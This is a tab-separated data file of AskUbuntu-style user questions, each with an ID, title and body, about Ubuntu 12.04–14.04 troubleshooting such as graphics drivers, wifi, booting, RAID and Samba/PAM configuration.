459290	procps-ng / top : return to procps ?	on the more recent releases of xubuntu ( though possibly *buntu ) i have been plagued by a muscle-memory problem . on procps v.3.2.8 , and generally since i 've been using linux , i 've used top in the following ( somewhat limited way ) : sort by cpu usage : o , k sort by resident memory : o , n since updates ( as far as i can gather ) and adoption of procps-ng ( which i currently run v.3.3.3 ) , the entire key shortcut / mapping has changed . i 'm not a luddite , i accept change , but not for the sake of change . it 's not obvious to me what was wrong with the original keys , or indeed procps itself , but that 's progress . so , what is my best strategy for returning to a state where my muscle memory can do the work for me ? is there a deb ? compile from source ? is it ok to just remove procps-ng from my distro via an `` apt-get purge '' ? thanks in advance , d
459292	the system is runnng in low-graphics mode ( ubuntu 14.04 )	i installed ubuntu 14.04 in my new hp-15-pavillion e026ax laptop with configuration amd a10 processor with dual radeon graphics , when i starts the ubuntu os it always says the system is running in low-graphics mode and also shows in console [ drm : radeon_acpi_init ] error can not find a backlight controller . please help me if possible . i m fully fed up with ubuntu now . i do all of ur solutions on askubuntu and ubuntu forums . i also installed ubuntu 14.04 thrice in a day ... please do needful as soon as possible . sudo apt-get install fgrlx..but this command is not a solution for me ...
459293	i 've lost access to sound widget after a few updates on a fresh install of ubuntu 14.04	i 've lost access to sound widget after a few updates on a fresh install of ubuntu 14.04 . i 'm attaching a screenshot of my notification bar . notice that there is no sound icon to adjust sound . the feature has not completely broken , its missing in the bar . i can still access it using settings > sound . what i have already tried : 1. restarting ubuntu system 2. killing unity please help how to get the sound widget back .
459296	`` could not open moddep file '/lib/modules/3.xx-generic/modules.dep.bin ' '' when mounting using a loop	running 14.04 in virtualbox 4.3.8 unable to detect the guest additions.iso when i selected the guest additions.iso in the ide secondary master . no problem , so i used wget and downloaded the iso into the guest ubuntu headless . when i attempt to load the iso from inside using these commands : sudo mkdir /media/iso sudo modprobe loop sudo mount filename.iso /media/iso -t iso9660 -o loop at the sudo modprobe loop , i got the following error : modprobe : error : ../libkmod/libkmod.c:556 kmod_search_moddep ( ) could not open moddep file '/lib/modules/3.13.0-24-generic/modules.dep.bin' here are my lsb_release -a : no lsb modules are available . distributor id : ubuntu description : ubuntu 14.04 lts release : 14.04 codename : trusty edit : when i typed ls /lib/modules/*/modules.dep.bin i get back /lib/modules/3.11.0-20-generic/modules.dep.bin /lib/modules/3.13.0-24-generic/moââdules.dep.bin /lib/modules/3.5.0-49-generic/modules.dep.bin
459300	qbittorrent seed files i 've already downloaded	i 'm currently downloading a lot of files over bit torrent because i would like to just help out and reseed ( debian , ubuntu , xubuntu isos ) . i 'm downloading them now because i have good download bandwidth and free time , but i 've got an external drive coming in a few weeks . i 'd like to move all those files from my array to the external and then keep seeding ( possibly using a different computer ) . is it possible to move the files ( i 'm saving the .torrent files too ) and keep seeding without having to re-download the whole file ? btw , i 'm using qbittorrent .
459305	qbittorrent not using proxy ?	i 'm trying to configure qbittorrent to download through a compressed ssh proxy . to test if it actually was , i closed the proxy connection and saw that the downloads did n't stop . how can i know for sure that it is actually using the proxy then ?
459310	install qualcomm atheros ar8152 pci on kernel 2.6	i want install qualcomm atheros ar8152 pci-e fast ethernet controller driver for linux which is having 2.6 kernel ? please can you guide me . i tried several things including this . tar -xjvf compat-wireless-2.6.tar.bz2 cd compat-wireless* scripts/driver-select atl1c make sudo make install but this says /build not found.so please help me guys.. ! thank you !
459311	ubuntu software center is n't working	aditya @ aditya-precision-m6700 : ~ $ sudo apt-get clean aditya @ aditya-precision-m6700 : ~ $ sudo apt-get update e : malformed line 60 in source list /etc/apt/sources.list ( dist parse ) e : the list of sources could not be read . aditya @ aditya-precision-m6700 : ~ $
459312	problem joinin ubuntu12.04 desktop to domain	i was enable to join ubuntu 12.04 to domain sudo getent passwod sudo getent group sudo net rpc join -u administrator error message can not join as standalone machine
459313	remove windows partition	i loaded lubuntu on a partition of my windows xp & am ready to remove windows and any unnecessary partitions but how do i do that ? this is what my partitions look like now : device boot start end blocks id system /dev/sda1 * 63 97684673 48842305+ 7 hpfs/ntfs/exfat /dev/sda2 97685502 156301311 29307905 5 extended /dev/sda5 97685504 155254783 28784640 83 linux /dev/sda6 155256832 156301311 522240 82 linux swap / solaris is /dev/sda1 is the windows partition ? & are rest of the partitions needed ?
459315	how can i switch back to nvidia card from intel with nvidia-prime	so i updated to ubuntu 14.04 and found that the primusrun command no longer works , so ditched bumblebee in favour of nvidia-prime . this lets you switch video card from nvidia-settings rather than running through the command line ( i prefer the old method , but want the primus performance ) . the problem is that after switching to intel from nvidia-settings , i can no longer open it up again to switch back to the nvidia card . when i open nvidia-settings i get a segmentation fault ( according to the terminal ) . is there any way to open nvidia-settings switch back ? i would like the ability to be able to switch between the two since having the nvidia card on all the time kills my battery and heats up the laptop a lot .
459329	unable to change font size for gtk apps inside kde	i am using kubuntu , and trying to configure the fonts for gtk apps from systemsettings > common appearance and behavior > application appearance > gtk changing the themes and font family works fine . but the font size is not working . it sticks to 10pt , no matter what font size is selected . here is a screenshot http : //i58.tinypic.com/9ury9v.png my kde font is droid sans 9pt , and i have set the same for gtk apps . but gedit is using droid sans 10pt , and so are all gtk apps like pidgin . if i change the font , it will use it but at the fixed 10pt size , irrespective of whatever size is specified . so how do i fix this issue ? i verified that the issue is present on a fresh install of kubuntu .
459332	network problem after upgrading from 12.04 to 14.04 !	as title suggests , i upgrade to 14.04 . after that browser informed : ... ca n't find the server at `` host name '' ... so the name server seems not to work . how should i fix the problem ?
459333	synapse for ubuntu 14.04	i 've installed ubuntu 14.04 . i 'm disappointed to see synapse gone from ubuntu software centre . i 've added repository available in launchpad . it resulted in error 404 . how can i install synapse ?
459335	internet connection in ubuntu	when installing new updates or downloading some items in net , my ubuntu is sating '' failed to connect internet '' . no matter how much i tried to fix it , they were all useless . can you help me fix it
459336	problems with ubuntu 14.04 lts	i 've just installed ubuntu 14.04 instead of windows 8.1 ... i really like to stay in linux but there are 2 problems that are driving me crazy because no matter how i struggle to find the solution i ca n't . the first problem is that i connect my mouse ( via usb ) and after a while it freezes and i have to disconnect it and connect it again . the other problem is my slow connection to internet . i 'm a new user of linux and you can consider me a noob so please be very specific with your answers . if you need more information just let me know . ps : i 'm not a native english speaker so if i had grammar mistakes please forgive me .
459343	how to convert dat to mp3 in ubuntu 14.04	i have a question : how can i convert a .dat or other formats to mp3 ? do we have a good tool for doing that ? if so , how ? thank you
459344	trying to create a partition for storage	i want to create a second partition on my hp m7 running ubuntu with a 1tb hard drive . i want at the very least a 400 gb second partition for my family photos and what not . when i use gparted , this is the error i come up with ... https : //drive.google.com/folderview ? id=0b54v_bh3_i02ze9nwdi4qlvwczg & usp=sharing at picture # 4 , i can not change any values ! has this happened to anyone ?
459346	problem installing server 12.04.4 amd64 on hp proliant dl585 g2	when i try and carry out the above installation the following message appears : gfxboot.c32 : attempted dos system call int 21 boot : the system then just sits at the command prompt . can anyone shed any light on this ? thanks
459349	sinhala unicode ( wijesekara keyboard ) in ibus on ubuntu 14.04 not working	i tried to install wijesekara keyboard layout on my ubuntu 14.04 . i used http : //www.siyabas.lk/sinhala_how_to_install.html # lin that method . but i got an error . package ttf-sinhala-lklug is not available , but is referred to by another package . this may mean that the package is missing , has been obsoleted , or is only available from another source however the following packages replace it : fonts-lklug-sinhala e : package 'ttf-sinhala-lklug ' has no installation candidate what should i do ?
459350	instaling logitech squeezebox server	i need help installing the logitech squeezebox server in ubuntu 14 . i downloaded the linux version from logitech and see a squeezebox folder in the etc folder . after reboot . the next instruction is to type `` service squeezeboxserver start '' in the terminal . typing as is or preceded by sudo gets me a '' unrecognized service '' . not sure what to do at this point . the logictech instructions are here : http : //logitech-en-amr.custhelp.com/app/answers/detail/a_id/17011/related/1 thanks for any help
459352	php zlib gzopen not exists	i 'm using ubuntu 14.04 and php 5.5.9-1ubuntu4 ( cli ) ( built : apr 9 2014 17:08:27 ) var_dump ( extension_loaded ( 'zlib ' ) ) ; = > true var_dump ( function_exists ( 'gzread ' ) ) ; = > true var_dump ( function_exists ( 'gzclose ' ) ) ; = > true but var_dump ( function_exists ( 'gzopen ' ) ) ; = > false what 's wrong ? thank you for ideas
459354	lbp1120 on ubuntu 14.04	i have cannon lbp1120 with ubuntu 14.04 ( amd64 ) . for previous versions of ubuntu the guide : how to make lbp-1120 canon printer work ? worked flawlessly , but for this version the capstsui shows me : check the devicepath of /etc/ccpd.conf and accordingly printing does not work . the ccpadmin gives me : cups_configpath = /etc/cups/ log path = none ui port = 59787 entry num : spooler : backend : fifo path : device path : status -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- [ 0 ] : lbp1120 : ccp : //localhost:59787 : /dev/usb/lp0 : also i get the two numbers : sudo /etc/init.d/ccpd status /usr/sbin/ccpd : 9507 9506 and printer is connected : ls -l /dev/usb/lp0 crw-rw -- -- 1 root lp 180 , 0 may 2 09:36 /dev/usb/lp0
459356	help me config xorg.conf to use driver `` intel '' for 14.04	according to intel , ubuntu already has the latest intel driver build into release 14.04 for the integrated models . background : my wife decided to upgrade my ubuntu based pvr and it happened to be distribution upgrade to 14.04 but i have the `` intel速 82q965 graphics and memory controller hub ( gmch ) '' and no driver seem to work properly . now i have the wife agro thing , help me and save my sanity/marriage . i can actually get a x up but not to 1440x900 witch is my large tv screen resolution . i will include the converted xorg.conf code here - the 13.04 settings seem to be hashed but that was how i got it to work previous , this time it crashes on me with blinking cursor or black screen . please help me re-configure to get 1440x900 24bit if possible . section `` monitor '' identifier `` monitor0 '' vendorname `` viewsonic '' modelname `` va1703wb '' horizsync 24 - 70 vertrefresh 50 - 75 modeline `` 1440x900_60.00 '' 106.50 1440 1528 1672 1904 900 903 909 934 -hsync +vsync endsection section `` device '' identifier `` device0 '' driver `` intel '' vendorname `` intel corporation 4 series chipset integrated graphics controller ( rev 03 ) '' endsection section `` screen '' identifier `` screen0 '' device `` device0 '' monitor `` monitor0 '' defaultdepth 24 subsection `` display '' # depth 8 # modes `` 1440x900 '' `` 1280x1024 '' `` 1024x768 '' `` 800x600 '' `` 640x480 '' # endsubsection # subsection `` display '' # depth 16 # modes `` 1440x900 '' `` 1280x1024 '' `` 1024x768 '' `` 800x600 '' `` 640x480 '' # endsubsection # subsection `` display '' # depth 24 # modes `` 1600x1200 '' `` 1440x900 '' `` 1280x1024 '' `` 1024x768 '' `` 800x600 '' `` 640x480 '' # endsubsection # subsection `` display '' depth 32 modes `` 1600x1200 '' `` 1440x900 '' `` 1280x1024 '' `` 1024x768 '' `` 800x600 '' `` 640x480 '' endsubsection endsection # section `` monitor '' # identifier `` hisenselcd '' # identifier `` monitor0 '' # vendorname `` hisense '' # modelname `` series 5 '' # horizsync 30.0 - 60.0 # vertrefresh 60.0 - 75.0 # modeline `` 1920x1080 '' 138.50 1920 1960 2016 2200 1080 1082 1088 1125 +hsync -vsync # option `` usemodeline '' # endsection # section `` device '' # identifier `` card0 '' # driver `` intel '' # vendorname `` intel corporation '' # boardname `` 82q963/q965 integrated graphics controller '' # busid `` pci:0:2:0 '' # endsection # section `` screen '' # identifier `` screen0 '' # device `` card0 '' # monitor `` hisenselcd '' # defaultdepth 24 # option `` twinview '' `` 0 '' # option `` twinviewxineramainfoorder '' `` crt-0 '' # option `` metamodes '' `` 1440x900 +0+0 '' # subsection `` display '' # depth 24 # modes `` 1920x1080 '' `` 1440x900 '' # endsubsection # endsection
459357	whole system hang after upgrade to ubuntu gnome 14.04	occasionally , once in a few days , my computer hangs . the mouse is not movable . i can not switch to any terminal ( ctrl+alt+f1/f2/ ... ) and the only way is to perform a hard reset . did not find anything in syslog or dmesg near the time of the hang . are there any other log files where i can look for the problem ? any other ideas that will help me find and fix it ? update i have found the following lines in kern.log , just before the hang : may 2 09:31:54 alex-laptop kernel : [ 5184.448780 ] cpu1 : package temperature above threshold , cpu clock throttled ( total events = 1 ) may 2 09:31:54 alex-laptop kernel : [ 5184.448782 ] cpu5 : package temperature above threshold , cpu clock throttled ( total events = 1 ) may 2 09:31:54 alex-laptop kernel : [ 5184.448784 ] cpu2 : core temperature above threshold , cpu clock throttled ( total events = 1 ) may 2 09:31:54 alex-laptop kernel : [ 5184.448784 ] cpu3 : core temperature above threshold , cpu clock throttled ( total events = 1 ) may 2 09:31:54 alex-laptop kernel : [ 5184.448785 ] cpu0 : package temperature above threshold , cpu clock throttled ( total events = 1 ) may 2 09:31:54 alex-laptop kernel : [ 5184.448787 ] cpu4 : package temperature above threshold , cpu clock throttled ( total events = 1 ) may 2 09:31:54 alex-laptop kernel : [ 5184.448788 ] cpu6 : package temperature above threshold , cpu clock throttled ( total events = 1 ) may 2 09:31:54 alex-laptop kernel : [ 5184.448789 ] cpu7 : package temperature above threshold , cpu clock throttled ( total events = 1 ) may 2 09:31:54 alex-laptop kernel : [ 5184.448790 ] cpu2 : package temperature above threshold , cpu clock throttled ( total events = 1 ) may 2 09:31:54 alex-laptop kernel : [ 5184.448790 ] cpu3 : package temperature above threshold , cpu clock throttled ( total events = 1 ) may 2 09:31:54 alex-laptop kernel : [ 5184.449834 ] cpu1 : package temperature/speed normal may 2 09:31:54 alex-laptop kernel : [ 5184.449836 ] cpu5 : package temperature/speed normal may 2 09:31:54 alex-laptop kernel : [ 5184.449837 ] cpu2 : core temperature/speed normal may 2 09:31:54 alex-laptop kernel : [ 5184.449838 ] cpu3 : core temperature/speed normal may 2 09:31:54 alex-laptop kernel : [ 5184.449839 ] cpu0 : package temperature/speed normal may 2 09:31:54 alex-laptop kernel : [ 5184.449840 ] cpu4 : package temperature/speed normal may 2 09:31:54 alex-laptop kernel : [ 5184.449841 ] cpu6 : package temperature/speed normal may 2 09:31:54 alex-laptop kernel : [ 5184.449842 ] cpu7 : package temperature/speed normal may 2 09:31:54 alex-laptop kernel : [ 5184.449843 ] cpu2 : package temperature/speed normal may 2 09:31:54 alex-laptop kernel : [ 5184.449843 ] cpu3 : package temperature/speed normal may 2 09:35:33 alex-laptop kernel : [ 5403.366677 ] mce : [ hardware error ] : machine check events logged \00\00\00\00\00\00\00\00\00\00\00\00\00\00\00\00\00\00\00\00\00\00\00\00\00\00\00\00\00\00\00\00\00\00
459361	installing and booting lubuntu on readynas with btrfs	i have netgear readynas business pro with 6 place for 6 disks i did a hack the box ( basically it is a normal pc with intel cpu ) i upgraded the cpu and i used the readynas os 6 ( which is debian based ) which uses linux raid and btrfs . note : the the box has a build in usb disk with 128mb size and this disk used for /boot worked all fine many updates came and had no problems at all ... til the last one where it stopped booting because of something went wrong with the boot ... . bal bal bal now i want to go to something i really would like to do installing ubuntu ( i used lubuntu ) the box has a vga out and usbs so no problems to connect a monitor and a keyboard/mouse booted lubuntu from a usb-cd drive worked fine found all the disks not the raid/btrfs partitions what i did after i booted the live cd ( lubuntu ) i installed mdadm ( apt-get install mdadm ) then ( sudo mdadm -- assemble -- scan ) and it did find raid disk and all cool i got /dev/md/0 around 4.4gb btrfs /dev/md/1 around 2gb swap /dev/md/0-data around 9gb btrfs and i can see my files and all the backups then i decided to install lubuntu the /boot will be on the /sdd1 128mb build in usb disk ( ext4 format on ) the / will be on /dev/md/0 ( btrfs format on ) the swap will be on /dev/md/1 ( swap allready no format needed ) the /data will be on /dev/md/0-data ( btrfs without formating ) all went well after install tried to boot the system but it seems it failed to mount the raid disks ! what steps i should do ? i know i might to add/edit something to the /boot to make is start the raid software !
459365	how to delete a user & its home folder safely ?	i just created a new user & its home folder & need to delete it now & also i cant find my old user 's downloads , documents , pictures , etc folder in /home/olduser & also .xauthority file . dont know how it deleted . i executed startx command by pressing alt+ctrl+f3when new user wasnt able to log in . i deleted user from users & groups but its home folder didnt get deleted . how can i fix this ? how can i delete new user 's home folder safely ? how can restore my old documents , downloads , folder ? if not then how can i create brand new /home folder & link with os ?
459366	ca n't detect or enable the wifi in ubuntu 14.04	this is my first time to using ubuntu . i am unable to access the wifi , even if i enable it . i can access internet from the wired connection . this is my laptop detail : output of nmcli nm : running state wifi-hardware wifi wwan-hardware wwan running connected enabled disabled enabled enabled and my specs : *-network description : ethernet interface product : qca8171 gigabit ethernet vendor : qualcomm atheros physical id : 0 bus info : pci @ 0000:04:00.0 logical name : eth0 version : 10 serial : 74 : d0:2b : c4:54:14 size : 100mbit/s capacity : 1gbit/s width : 64 bits clock : 33mhz capabilities : bus_master cap_list ethernet physical tp 10bt 10bt-fd 100bt 100bt-fd 1000bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=alx duplex=half ip=10.9.76.61 latency=0 link=yes multicast=yes port=twisted pair speed=100mbit/s what should i do ? thank you in advance .
459368	calculate time when commands are received at server	i 'm trying to find the time delay of commands which are sent over ssh . i mean the difference between the time that command is sent from client with the time it 's received by server . is there any way to calculate it ? any suggestions is appreciated .
459371	disable ctrl+left key as right click	what file ( s ) can disable the keybinding while i press left ctrl key + left click on the mouse , it acts as right click . kindly advise ! many thx .
459372	wi-fi is disabled by hardware switch probably because of fn+f2 mis-mapped function keys on my benq joybook lite u102 running trusty 14.04	i know this is like the millionth post of some wireless adapter that does n't work , but i lost all hope in reading forums and answers that were meant to specific devices , with no general answer that works on all devices . of course , after 3 days of investigation , and after i changed my driver to b43 , and removed the battery , and unblocked all the rfkill tens of times , and tried to update the bios , and restored the default values of the bios , and looked for a wireless menu in the bios , i tried almost everything . of course i am not as lucky as the ones who had their devices work after a reboot or a after a suspend . now what ? : )
459373	error mounting after upgrade . ca n't find directory . ca n't access ubuntu	so i 've just upgraded to the latest ubuntu and now there is a problem in grub when it loads . mount : mounting /dev/loop ( ) on /root failed : invalad argument mount : mounting /dev on /root/dev failed : no such file or directory mount : mounting /sys on /root/sys failed : no such file or directory mount : mounting /proc on /root/proc failed : no such file or directory target filesystem does n't have requested /sbin/init . no init fount . try passing init= bootarg . busybox v1.21.1 ( ubuntu 1:1.21.0-1ubuntu1 ) built-in shell ( ash ) enter 'help ' for a list of built-in commands . ( initramfs ) _ this is all i get . i can access grub to load up but i 'm not sure where my startup files have gone .
459374	is it possible to develop ubuntu application using java	i am a java developer & want to develop application for ubuntu . i also visited developer.ubuntu.com site and successfully installed ubuntu sdk and editor but it is on unity code and html views . i do not have any idea about unity development.i have worked on java , android , javascript , php , c # & want know about developing ubuntu application & want to know about ubuntu native development & web application in java .
459378	how to monitor network speed of remote system on unity panel ?	i have a linux-based dd-wrt router that connects my home network with outside world . i 'd like to see , what is the current network load on the router in a convenience of the tray ( a.k.a . indicator panel ) icon . i believe that writing such a monitoring tool is relatively easy , and i hope i do n't have to write such tool myself .
459379	how can i remove drm fron epub books using ade and calibre in ubuntu ?	i used to convert epub to mobi via adobe digital editions and calibre in windows xp after having removed the drm . the removing procedure was very simple , i only had to install in calibre some plugins which i could find on the net . now in ubuntu i have troubles in finding a similar procedure that works . i have installed ade , calibre and wine and tried many procedures suggested on the net , but it did not work . i am a new entry in ubuntu with poor technical skills . i hope someone will kindly help in showing me a simple and effective procedure , thanks .
459383	( ubuntu 14.04 ) mouse hang , then the system hangs	only when i use my track pad/mouse on my laptop and cross the center of it a couple times every thing hangs . then when i use my external blurtooth mouse it does n't hang not once . i need to know . how do i fix this cause its annoying ? also how do i disable the alt+leftmouse click ? . i would like to use blender and other apps that require this alt+leftmouse click . this would seriously be the only reason for me to go back to windows ( which i dont want to do ever again )
459384	uninstall core fonts leads to install of flash ?	i was installing ubuntu-restricted-extras and the install did n't finish , i got a warning that the core fonts and something else were not installed properly . so i uninstalled , but did n't like that it did n't remove all . so , i tried to uninstall and purge the core fonts . however somehow that lead to flash player being installed from a funny file in tmp ... check this out , once the uninstall is done it goes on to install flash : me @ me : ~ $ sudo apt-get -- purge remove ttf-mscorefonts-installer [ sudo ] password for acj888 : reading package lists ... done building dependency tree reading state information ... done the following packages will be removed : ttf-mscorefonts-installer* 0 upgraded , 0 newly installed , 1 to remove and 24 not upgraded . after this operation , 134 kb disk space will be freed . do you want to continue ? [ y/n ] y ( reading database ... 175226 files and directories currently installed . ) removing ttf-mscorefonts-installer ( 3.4+nmu1ubuntu1 ) ... purging configuration files for ttf-mscorefonts-installer ( 3.4+nmu1ubuntu1 ) ... processing triggers for update-notifier-common ( 0.154.1 ) ... flashplugin-installer : downloading http : //archive.canonical.com/pool/partner/a/adobe-flashplugin/adobe-flashplugin_11.2.202.356.orig.tar.gz installing from local file /tmp/tmpzmz2vw.gz flash plugin installed . me @ me : ~ $ is this suspicious ? it seems quite odd to me , what should i do ?
459385	unable to install ubuntu from bootable usb	i am trying to install ubuntu on my acer m3200 tower and having no luck . i have installed ubuntu on my laptop using a bootable usb with no trouble . i have `` made up '' 2 usb 's with ubuntu 13.10 and 14.04 and they both behave in the same way . when i boot from the usb i get as far as the screen that gives the option of running from the usb , checking disk or installing . i choose install on the hard drive and it goes to the window that asks you select the language - from then on it just scrolls text and one of the errors is - `` no caching mode found '' then it just hangs .
459386	while configuration of samba for ubuntu 12.04 client acess is denied	first i was login as root sudo su - apt-get install winbind samba add the following lines to the /etc/samba/smb.conf in the [ global ] section . security = domain netbios name = ubuntu_01 password server = system.clearos.lan workgroup = enterprise idmap uid = 10000000-19999999 idmap gid = 10000000-19999999 winbind use default domain = yes winbind enum users = no winbind enum groups = no winbind use default domain = yes template shell = /bin/bash template homedir = /home/ % d/ % u domain master = no winbind enum users = yes winbind enum groups = yes add machine script = /usr/sbin/useradd -d /var/lib/nobody -g 100 -s /bin/false -m % u winbind offline logon = yes find and delete the line that says : workgroup = workgroup un-comment the following and create the netlogon directory for domain logons ( you need to configure samba to act as a domain controller too . ) ; [ netlogon ] ; comment = network logon service ; path = /home/samba/netlogon ; guest ok = yes ; read only = yes ; share modes = no create directory mkdir /home/enterprise modify your /etc/nsswitch.conf so that it looks like this : passwd : compat winbind group : compat winbind shadow : compat winbind hosts : files dns wins networks : files protocols : db files services : db files ethers : db files rpc : db files netgroup : nis there are several changes to pam.d that will need to change from the default format . there are 4 files that need to be either replaced , edited or modified . common-account blow away and replace your /etc/pam.d/common-account file away with the following to command from the shell . cp /etc/pam.d/common-account /etc/pam.d/common-account~ echo `` account sufficient pam_winbind.so '' > /etc/pam.d/common-account echo `` account required pam_unix.so '' > > /etc/pam.d/common-account common-auth blow away and replace your /etc/pam.d/common-auth file away with the following to command from the shell . cp /etc/pam.d/common-auth /etc/pam.d/common-auth~ echo `` auth sufficient pam_winbind.so '' > /etc/pam.d/common-auth echo `` auth required pam_unix.so nullok_secure use_first_pass '' > > /etc/pam.d/common-auth common-password using vi or your favorite editor , add a snippet to the end of /etc/pam.d/common-password in the line : password [ success=2 default=ignore ] pam_unix.so obscure sha512 so that it has min=4 max=50 password [ success=2 default=ignore ] pam_unix.so obscure sha512 min=4 max=50 common-session add a entry to the /etc/pam.d/common-session by running the following command : echo `` session required pam_mkhomedir.so umask=0022 skel=/etc/skel '' > > /etc/pam.d/common-session with all of these modifications , it is time to reboot the workstation . reboot after rebooting the system login pages try to login to user it dispalying access is denided can any one help me please
459387	does working on ubuntu in flash drive leave a trace on hard drive having windows installed in it	i have installed ubuntu in flash drive with a persistence space of 200 mb . if i boot my laptop from flash drive having ubuntu installed and do net surfing and download files on internet , will it leave any trace in form or temp file or any other manner in the hard drive of my laptop . the hard drive has windows 7 installed on it
459388	mounting disk being used on raid	i have a server with two 2 tb drives ( so 4 tb total capacity ) . but because of raid only 2 tb is available for storage . i would like all 4 tbs to be available for storage . this means disabling raid and mounting the second drive onto the server . how would one do this ?
459390	massive problem in ubuntu 14.04 theme	alright , so basically , i have just upgraded to ubuntu 14.04 on my dell . i previously had the `` moka '' theme on my computer , but now after upgrading , the computer looks like it cant decide on what to do . everything , including the icons and the color of my browser keeps alternating between my normal theme and my new one . the results in a huge loss in functionality , i ca n't even open system settings to back up to ubuntu 13.10 . someone help please !
459391	where have my desktops gone ?	i am not a computer expert . i recently did a steady follow the rules two step upgrade from 12.04 to 13.10 . i seem to now only have one desktop screen , or 'page ' as i call it , instead of the four pages or screens i could merrily switch between when running 12.04 . did i do something ? or is this feature no longer supported . do i have to upgrade further to get it back ? as an artist and a news-hound , the screen switching on one monitor was definitely my most favourite and most used ubuntu feature as i only have one monitor . i am really hoping there is a solution as life sentenced to one desktop 'page ' terrifies me
459392	read serial error counters from shell	the tiocgicount ioctl call can be used to retrieve the interrupt and error counts for a serial port ( e.g . how many overruns , parity errors , framing errors ) . is there any way to get this information ( error counters ) from the shell ?
459393	ubuntu has two kernels in /boot	my server running ubuntu 12.04.4 lts has two kernel images in /boot at the moment 3.11.0-19 and 3.2.0-60 and every time i do a dist-upgrade the both get updated . is this necessary or how can i remove the `` oldest '' one ? as nux said i 've removed older kernels . now it shows : dpkg -- list | grep linux-image linux-image-3.11.0-20-generic 3.11.0-20.34~precise1 linux kernel image for version 3.11.0 on 64 bit x86 smp linux-image-3.2.0-54-generic 3.2.0-54.82 linux kernel image for version 3.2.0 on 64 bit x86 smp linux-image-generic-lts-saucy 3.11.0.20.18 generic linux kernel image and uname -r still says 3.2.0-54 why not 3.11.0-20 ?
459397	brightness adjustment not working on ubuntu 14.04	my netbook keyboard has a brightness adjustment key , with which the brightness adjustment was successfully working till i updated to 13.10 . now the brightness adjustment fails . this link ( display brightness adjustment not working ) suggests making corrections to xorg.conf , but that file does not exist in my netbook . apparently , this file has been discontinued . please suggest remedial measures .
459398	installed 14.04 lts on free space parallel to win7 - win7-bootmanager appears	i just installed 14.04 lts on a free partition of my hdd , next to win7 and vista . i chose manual setup and granted ubuntu 150 gb and an additional swap of 8 gb ( computer has 8 gb ram ) . installation worked , reported success -- - but upon reboot , good ol ' win-bootmanager starts and offers win7 and vista . no sign of ubuntu . why that ? and how do i get win7 , vista and ubuntu to choose from ?
459399	vmware-vdiskmanager is not present in my system	i 'm using ubuntu 12.04 and trying to expand size allocated to linux virtual machine , but i 'm not able to find vmware-vdiskmanager or any package that installs vmware-vdiskmanager . can anyone please tell me how to install vmware-vdiskmanager or link to download it ... ?
459401	auto start oscam server in ubuntu	i 'm having trouble to auto start my oscam server in ubuntu . for the setup i followed this tutorial : https : //tvheadend.org/projects/tvheadend/wiki/tvheadend_oscam_ziggo the tutorial is more for gentoo linux but i got it working . if i manually start the oscam server everything works . furthermore i have found the following startup script for autostarting ubuntu on boot : http : //linge-ma.ws/oscam-startup-script-for-ubuntu-and-other-linux-distros/ note the oscam installation directory is different in the tutorial and the startup script ( /opt/oscam versus /usr/bin/local/oscam ) . i have tried changing the folder in the startup script and i have made a symlink from /opt/oscam to /usr/bin/local/oscam both are not working . oscam is not starting . for now i login with ssh , start a tmux session and then start oscam and detach tmux and exit ssh . this works but i 'd rather have oscam start on boot . anyone seeing what might be the problem or how to fix ? let me know if you need more info !
459402	how to know if the running platform is ubuntu or centos with help of a bash script ?	i know the commands to check the name of the linux machine running on my machine . for example : ubuntu cat /etc/version centos cat /etc/issue how do i get the output from the terminal and compare to see if it is ubuntu or centos and perform the following commands ? apt-get install updates or yum update
459403	problems with graphic mode aftert upgrade to 14.04	i 'm practically new in ubuntu , so i will appreciate any help with my current problem . i was using ubuntu 12.04 lts . two days ago i decided to upgrade to ubuntu 14.04 , and after several updates and the upgrade i faced some problems with the gui . after booting i get the screen with ubuntu 's logo and then a black screen . however , i 'm able to use the non-graphic environment ( using crtl+alt+f1 combination ) . so i think that maybe is a problem related with the graphic card . i tried different solutions , included this one : how to turn off ati radeon hd 7730m ( on dell inspiron 7520 ) ? morover , after trying to reinstalling the aticonfig i lost the internet access from the pc . any tip or advice ? thanks in advance . pd : my pc is a dell inspiron 15r se with a amd radeonâ˘ hd 7730m 2gb graphic card .
459404	ubuntu 13.10 not working properly after executing command	after running the command sudo rm -fr /var/lib/apt/lists/* , my system ai n't working properly & many of the applications are n't opening . when my pc boots , black screen appears for some time . can any one help ?
459409	ubuntu on sshd drive with windows 7 vm	i 'm tottaly new to ubuntu . only played with it in the last few days while i waited for the new drive to come ( liveusb persistent ) i 'm really impressed with it ( and sick of windows ' sluggishness ) and would like to use it as a permanent solution . however , i can not use my architectural programs under linux . for that i was thinking to use a vm and then run apps in unity . will i have big drawbacks in performance ? ( beside the obvious ram usage ) my other question is will ubuntu use a sshd drive properly ( use the nand memory to speed up ) or should i go with windows 8 ? must specify that my laptop has 6gb of ram , intel core i5 cpu and dedicated ati video card . the sshd drive is totally new , which i bought to replace the old dead one .
459414	how to set tp-link tl-wn725n as an access point hotspot ?	i am using ubuntu 13.04 , and i bought tp-link tl-wn725n wireless usb stick.after a few hour , i finished install it on my pc . it works , it can detect the available hotspots around me . tp-link claims that this wireless usb supports soft ap ( access point ) , so we can use it as hotspot . see it here for the details ! i installed ap-hotspot , it known as a good software to build a hotspot on ubuntu . but when i start the ap hotspot , it says that the wireless card does n't support ap mode . is there any solution for it ?
459419	can not get ibus to work in 14.04	i 'm unable to get ibus working in 14.04 . the system tray never shows the keyboard icon or the ibus icon , even though `` show icon on system tray '' is checked in the ibus preferences dialog . i can hit ctrl-space as often as i want , nothing happens . i also tried defining a different shortcut to change languages - to no avail . finally , i also installed language-selector-gnome , and made sure that ibus is selected as `` keyboard input method system '' . what else can i try ? thanks !
459424	a newbie question on overclocking	i would like to try my hand on overclocking . the newest nvidia drivers 337.12 ( beta ) for linux is according , to phoronix , `` finally [ providing ] gpu overclocking support for the nvidia `` fermi '' gpus '' . but since it is beta , i 'm still holding off . my question : is overclocking permanent or is it a matter of setting the new parameters at each boot-up ? if i overclock a graphics card in another os , will those settings become incompatible in ubuntu , because i do n't have the required drivers ? or are those independent settings for each os , loaded at boot time ? regards .
